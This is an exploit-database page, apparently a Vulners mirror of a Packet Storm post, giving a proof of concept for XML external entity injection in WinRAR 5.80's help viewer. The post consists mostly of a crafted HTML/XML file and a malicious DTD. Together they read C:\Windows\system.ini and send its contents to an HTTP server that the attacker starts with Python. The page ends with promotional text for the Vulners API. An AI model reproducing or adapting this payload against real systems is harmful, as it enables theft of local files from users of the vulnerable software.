Lucene search
K

WinRAR 5.80 XML Injection

🗓️ 20 Oct 2019 00:00:00Reported by albalawi-sType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 219 Views

WinRAR 5.80 XML Injection, External Entity Injection, 64bi

Code
`  
# Exploit Title: winrar External Entity Injection  
# Exploit Author: albalawi-s  
# Vendor Homepage: https://win-rar.com  
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe  
# Version: 5.80  
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit  
  
#https://twitter.com/test_app_______  
  
#poc video   
  
https://www.youtube.com/watch?v=XpFvSHeVB7E  
  
# POC  
=====================================================  
1- python -m SimpleHTTPServer 8000  
2- open winrar or any file.rar  
3- help  
4- help topics  
5- Drag the html file to the window  
  
  
html file  
  
<htmlL>  
<body>  
<xml>  
<?xml version="1.0"?>  
<!DOCTYPE flavios [   
<!ENTITY % file SYSTEM "C:\Windows\system.ini">  
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/start.dtd">  
%dtd;]>  
<pwn>&send;</pwn>  
</xml>  
</body>  
</html>  
  
==============================  
start.dtd  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">  
%all;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation